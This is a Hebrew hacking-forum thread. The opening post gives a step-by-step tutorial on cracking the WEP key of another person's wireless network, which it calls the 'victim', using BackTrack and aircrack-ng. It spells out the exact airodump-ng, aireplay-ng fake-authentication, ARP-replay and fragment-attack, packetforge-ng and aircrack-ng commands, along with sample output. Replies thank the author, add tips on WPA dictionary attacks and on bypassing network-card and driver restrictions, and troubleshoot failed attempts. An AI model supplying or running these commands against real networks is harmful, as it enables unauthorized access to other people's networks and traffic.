[מדריך] פריצת WEP עם Backtrack (רשתות אלחוטיות)

[Zer0Day]

החלטתי לפרסם מדריך איך לפרוץ WEP עם המערכת הפעלה באק טראק
קודם כל תצטרכו Aircrack..
יש בבאק טראק (הפצה של לינוקס) כבר אחד מותקן לא צריך להסתבך
מצרכים:
-BackTrack (אפשר להורדה כאן)
-כרטיס רשת שתומך בפאקטס אינג'קטשן
סתם כרטיס לדוגמא שתומך

EDIMAX EW-7318Ug
עכשיו לעניינו..
קודם כל אתם צריכים באק טראק על דיסק / USB צרוב כמו ווינדוס נניח או כל מערכת הפעלה אחרת.
עכשיו תכניסו את הדיסק ותעשו בדיוק איך שאתם מתקינים ווינדוס חדש..
אבל ברגע שתפתחו תהתקנה אתם תראו משהו כזה..

תלחצו על הראשון ,אם אתם רוצים שמשעשיתם יישמר לך תלחצו על LiveCD
עכשיו אחרי שזה ייטען אתם תראו חלון שחור כזה כמו CMD
תכתבו בו startx
ותחכו עד שזה יסיים..
עכשיו תעשו ככה -
עכשיו תפתחו את הקונסול..
iwconfig - כדי לראות את הסטטוט של כל הרשתות..
ותרשמו בקונסול airmon-ng start wlan0 ותלחצו אנטר

ועכשיו תכתבו
airodump-ng --encrypt wep mon0

קוד:

BSSID = הכתובת MAC של הקורבן
CH = מספר צאנל
ENC = סוג הצפנה
ESSID= הרשת של הקורבן

הפרטים של הקורבן שלנו
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}
ועכשיו נעשה ככה..
אחרי שכתבתם את זה תלחצו ctrl+c
ככה..

ועכשיו תכתבו בקונסול ככה -
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0
נלחץ אנטר וזה יהיה לנו ככה..

עכשיו תלחצו ctrl+c
ותכתבו
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0
אם הצלחנו זה יביא לנו תפלט

קוד:

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

ונכתוב בקונסול
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0
ונלחץ אנטר.. וזה יראה לנו ככה -

אחרי כמה שניות זה ישאל אותך משהו ותכתוב Y ואז אנטר
ואז תכתוב בקונסול ככה - aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

כמעט סיימנו ,אל תתייאשו (:
תכתבו בקונסול

קוד:

packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag

ואז זה יראה לנו ככה -

ואז תרשמו
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0
ולאחר מיכן תלחצו אנטר ואז זה יראה לכם ככה

כשהData יגיע לכם בערך ל30 אלף תעשו ctrl+c
ואז תכתבו aircrack-ng wephack-01.ivs
ואז אנטר..
והינה הסיסמא (:

תהנו

[Pro.Hacker]

תודה רבה

[ShRedDeR]

תודה אחי!!

[Undecided]

"אין לדבר על פורומיפ מתחרים."

[Num32]

מדריך מצויין !
WEP הצפנה שקלה מאוד לפריצה , WPA גם את הצפנה הזאת אפשר , רק צריך מילון אם סיסמאות יש אחד כזה בBACKTRACK אם אני לא טועה קוראים לו JHON ..
וגם בWPA2 יש חולשות - גלגלו על HOLE 196 ...
אגב , זה דורש משתמש Client מחובר ?


יש את הכלי Aircrack גם בממשק GUI לWINDOWS מומלץ להתנסות.

בתור אחד שקנה כרטיס רשת ונדפק עם אחד לא שנתמך בהתקפה שימו לב לפני שאתם קונים כרטיס.
כמה שפחות אישורים על ידי משרדי תקשורת שונים - כרטיס מאושר - יש לו חסימה בתוכו שלא נותנת לגנוב פאקטצים שלא נועדים לו ..

במידה וקניתם כרטיס שאינו נתמך ,בררו שאיזה שיטה החסימה קיימת (שאתם מנסים להכנס למצב מוניטור בAIRMON-NG
אם מדובר בחסימה ברמת הMAC - לפרוץ את זה, זה קשה ולפעמים בלתי אפשרי והכרטיס יודע איזה כתובת MAC צרובה אצלו , כלים כגון SMAC / MAC CHANGER לא ישנו את זה , כיון שהם רק מזייפים את הMAC לא משנים את זה ברמת הכרטיס עצמו אל רק בשידור כלפי חוץ.
אבל בכל זאת שווה לנסות , במקרה ונפלתם בכרטיס טמבל

חסימה ברמת הDriver - תורידו דרייבר פרוץ , או אפילו תכתבו כאלה אם אתם ברמה של ביצוע משימה כזאת ..אין הרבה דרייברים פרוצים כאלה למוצרים של Microsoft , ללינקוס יש הרבה אז במידה יש לך אחד חסימה ברמת הדרייבר התתקינו אותו ישירות לBacktrack..
יש דרייברים שלינוקס/וינדוס שלפעמים הם מגיעים בZIP עם כל מיני קבצי DAT וCAT , לפי דעתי אם תמחקו מהZIP את קבצי הCAT , הדרייבר יהפוך לפרוץ לחלוטין ,לפעמים כשאתם מתקינים אחרי מחקתם את קובצי הCAT הSETUP אומר ארור לא תמיד אבל זה לפעמים קורה ואז תכניסו קובצי CAT באותם מקומות ואין בתוכם שם ערך Hex , כיוון שקבצי קט נקראים קטלוגי אבטחה , ויש בתוכם ערכי Hex שלפעמים מבצעים את החסימה
ורק אחרי שמחקתם התקינו את הSETUP של הדרייבר.
מומלץ לגלגל על קבצי CAT בגוגל .
או כשנראה לא מותקן אצלכם Winpcap ..
WINPCAP היא ספרייה שמשתמשים בה הרבה תוכנות סיינפיג , יכול להיות שזאת בעיה במקרה הAircrack..
ואם התקנתם ועדיין יש מצב שלא עובד תנסו להתקין ספריות אחרות .
ולא רק באק טראק היא המערכת היחידה , יש גם את FBI ואחרות שמבצעות פעולה מהירה יותר טובה משל Aircrack..
לפי מה שהבנתי באיזה מדריך אחד באיזה פורום כמעט כל הכרטיסים שלא תומכים בתקן N , נגישים לביצוע התקפה הזאת..
(יש גם N שתומכים, אבל ברובם קיימת חסימה)
בניה

[_vi7ut_]

אני אישית לא מתחבר לכול הקטע הזה של פריצת הרשתות עם AirCrack,
כבר ראיתי מה קרה בעזריאלי.

[Num32]

אני אישית לא מתחבר לכול הקטע הזה של פריצת הרשתות עם AirCrack,
כבר ראיתי מה קרה בעזריאלי.

מה קרה בעזריאלי ?

[_vi7ut_]

מה קרה בעזריאלי ?

לא משהו שקשור אלייך או אל אחד המשתמשים פה חוץ מShad0w ואליי.

[Kanlo]

איך אני בודק איזה כרטיס יש לי ואיך אני בודק אם זה תומך ?
שאני רושם airmon-ng start wlan0
Found 1 processes that could cause trouble.
זה רושם לי
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

NAME PID
מספר מסוים שם מסוים

מה זה אומר מה הבעיה ?

[SaTlaPc]

תודה : )

[idoshabi]

אחי אני עושה הכל טוב ואז אני מגיע לקטע הזה
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0
http://i1216.photobucket.com/albums/.../aireplay3.png
ואז בREAD הוא ממשיך לעלות מגיע ל300000-40000 ולא נעצר ושואל שאני צריך ללחוץ על Y
אחרי שהתייאשתי לחצתי CTRL+C,
ואז הכנסתי את הפקודה aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0
ואז הוא כן שאל אותי ולחצתי Y
ואז בפקודה הבאה
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag

הוא רושם שהוא לא מוצא את WEBFRAG מה לעשות?

תודה

[buk4]

אוי מפגר
אתה צריך לקחת ת כתובת מאכ שהשאלל הוציא לך..

[idoshabi]

אוי מפגר
אתה צריך לקחת ת כתובת מאכ שהשאלל הוציא לך..

וואי באמת? בואנה אתה גאון הדור איך לא חשבתי על זה קודם.

לא הייתי יכול להמשיך בכלל בלי הכתובת מאק!
קיצר פותח אשכול יקר תענה לי בבקשה.
תודה

[Zer0Day]

וואי באמת? בואנה אתה גאון הדור איך לא חשבתי על זה קודם.

לא הייתי יכול להמשיך בכלל בלי הכתובת מאק!
קיצר פותח אשכול יקר תענה לי בבקשה.
תודה

אתה רציני?
BSSID=MAC ADDRES

[buk4]

אז אני גאון הדור או לא?